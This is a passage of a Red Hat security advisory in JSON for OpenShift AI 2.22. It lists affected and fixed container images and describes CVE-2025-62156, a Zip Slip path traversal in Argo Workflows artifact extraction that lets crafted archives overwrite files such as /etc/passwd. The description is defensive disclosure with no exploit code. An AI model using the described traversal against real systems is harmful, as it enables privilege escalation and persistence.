"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
},
{
"cve": "CVE-2025-62156",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-14T15:02:10.015356+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403800"
}
],
"notes": [
{
"category": "description",
"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "RHBZ#2403800",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403800"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993",
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011",
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3",
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
}
],
"release_date": "2025-10-14T14:52:44.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
